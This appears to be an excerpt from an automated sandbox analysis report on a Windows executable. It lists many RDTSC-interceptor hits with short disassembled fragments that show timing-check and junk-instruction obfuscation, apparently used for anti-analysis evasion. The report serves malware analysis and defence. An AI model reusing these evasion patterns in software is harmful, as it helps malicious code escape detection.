Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427CA6 second address: 1427CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427CAC second address: 1427CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427CB0 second address: 1427CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007FB1C8B21D47h 0x0000000d jmp 00007FB1C8B21D44h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427CE9 second address: 1427CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428463 second address: 1428469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1428BBB second address: 1428BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142B3F5 second address: 142B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142B3F9 second address: 142B3FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142B3FD second address: 142B40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB1C8B21D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142B40F second address: 142B419 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB1C8D0EF66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142FDF2 second address: 142FE09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB1C8B21D3Dh 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142FE09 second address: 142FE0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142FE0D second address: 142FE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14314B4 second address: 14314BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1436029 second address: 143605A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB1C8B21D40h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1435C05 second address: 1435C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1435C0D second address: 1435C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14462B6 second address: 14462EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8D0EF77h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1C8D0EF76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14462EB second address: 14462EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144B0D4 second address: 144B0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB1C8D0EF75h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144B0EE second address: 144B0F8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB1C8B21D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144AE65 second address: 144AE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144AE69 second address: 144AE73 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1C8B21D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144AE73 second address: 144AE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F245 second address: 145F24A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F24A second address: 145F27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8D0EF76h 0x00000009 jp 00007FB1C8D0EF66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FB1C8D0EF6Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F27D second address: 145F288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB1C8B21D36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F501 second address: 145F507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F507 second address: 145F50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F95C second address: 145F961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145F961 second address: 145F97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB1C8B21D40h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14640D8 second address: 14640F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB1C8D0EF78h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1463D87 second address: 1463D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1463D8B second address: 1463D95 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14656C8 second address: 14656D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1C8B21D3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14656D8 second address: 14656DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14656DE second address: 1465733 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FB1C8B21D42h 0x00000014 pushad 0x00000015 je 00007FB1C8B21D36h 0x0000001b jmp 00007FB1C8B21D45h 0x00000020 jmp 00007FB1C8B21D48h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1465733 second address: 146574D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB1C8D0EF75h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146574D second address: 1465756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1465756 second address: 146575A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146F7FD second address: 146F801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146F801 second address: 146F81F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF78h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147170D second address: 1471713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1471713 second address: 1471719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1471719 second address: 147171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147171F second address: 1471725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1471725 second address: 147172B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1475374 second address: 147537E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147537E second address: 1475388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB1C8B21D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1477A53 second address: 1477A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1477A59 second address: 1477A75 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FB1C8B21D42h 0x00000010 jmp 00007FB1C8B21D3Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1484DB2 second address: 1484DD7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB1C8D0EF6Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB1C8D0EF6Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1486937 second address: 1486952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D189 second address: 149D1A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1C8D0EF7Fh 0x00000008 jmp 00007FB1C8D0EF73h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D420 second address: 149D428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D428 second address: 149D458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB1C8D0EF78h 0x0000000a jmp 00007FB1C8D0EF70h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D5E3 second address: 149D5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB1C8B21D3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149D5F3 second address: 149D602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149DE67 second address: 149DE6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 149DE6B second address: 149DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A0C41 second address: 14A0C4B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A0CFC second address: 14A0D17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d js 00007FB1C8D0EF66h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A0D17 second address: 14A0D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A0F77 second address: 14A0F7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A23CE second address: 14A23D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A23D2 second address: 14A23DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A3D0B second address: 14A3D10 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A3D10 second address: 14A3D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A3D16 second address: 14A3D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FB1C8B21D3Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A5CD6 second address: 14A5CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A5CDB second address: 14A5CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A5CE1 second address: 14A5D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 jnl 00007FB1C8D0EF66h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FB1C8D0EF74h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB1C8D0EF73h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14A5D1C second address: 14A5D2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FB1C8B21D36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0295 second address: 55D029B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D029B second address: 55D02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D02A1 second address: 55D02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D02A5 second address: 55D02DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB1C8B21D40h 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov edx, 74FC3022h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D02DD second address: 55D02FE instructions: 0x00000000 rdtsc 0x00000002 mov esi, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FB1C8D0EF6Eh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D02FE second address: 55D0302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0302 second address: 55D0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0306 second address: 55D030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D03C0 second address: 55D03C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D03C6 second address: 55D03CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D03CA second address: 55D03CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0442 second address: 55D0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ecx, 4185F585h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FB1C8B21D3Dh 0x00000015 pop ecx 0x00000016 jmp 00007FB1C8B21D41h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0472 second address: 55D0482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8D0EF6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D051F second address: 55D0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0524 second address: 55D0558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 0ABD76CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FB1C8D0EF6Ah 0x00000016 call 00007FB1C8D0EF72h 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0558 second address: 55D055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0623 second address: 55D0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0629 second address: 55D062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D062D second address: 55D06B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FB1C8D0EF6Eh 0x00000013 mov esi, edx 0x00000015 jmp 00007FB1C8D0EF70h 0x0000001a mov al, byte ptr [edx] 0x0000001c jmp 00007FB1C8D0EF70h 0x00000021 inc edx 0x00000022 pushad 0x00000023 jmp 00007FB1C8D0EF6Eh 0x00000028 call 00007FB1C8D0EF72h 0x0000002d pushad 0x0000002e popad 0x0000002f pop esi 0x00000030 popad 0x00000031 test al, al 0x00000033 pushad 0x00000034 mov bx, C6A0h 0x00000038 push eax 0x00000039 push edx 0x0000003a mov eax, ebx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D06B2 second address: 55D06B2 instructions: 0x00000000 rdtsc 0x00000002 call 00007FB1C8B21D3Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007FB1C8B21CDCh 0x00000011 mov al, byte ptr [edx] 0x00000013 jmp 00007FB1C8B21D40h 0x00000018 inc edx 0x00000019 pushad 0x0000001a jmp 00007FB1C8B21D3Eh 0x0000001f call 00007FB1C8B21D42h 0x00000024 pushad 0x00000025 popad 0x00000026 pop esi 0x00000027 popad 0x00000028 test al, al 0x0000002a pushad 0x0000002b mov bx, C6A0h 0x0000002f push eax 0x00000030 push edx 0x00000031 mov eax, ebx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D06D3 second address: 55D06EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8D0EF75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D06EC second address: 55D06F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D06F0 second address: 55D0712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub edx, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1C8D0EF74h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0712 second address: 55D0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0716 second address: 55D071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D071C second address: 55D075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e jmp 00007FB1C8B21D40h 0x00000013 dec edi 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB1C8B21D3Ch 0x0000001c sub ecx, 6EDED338h 0x00000022 jmp 00007FB1C8B21D3Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
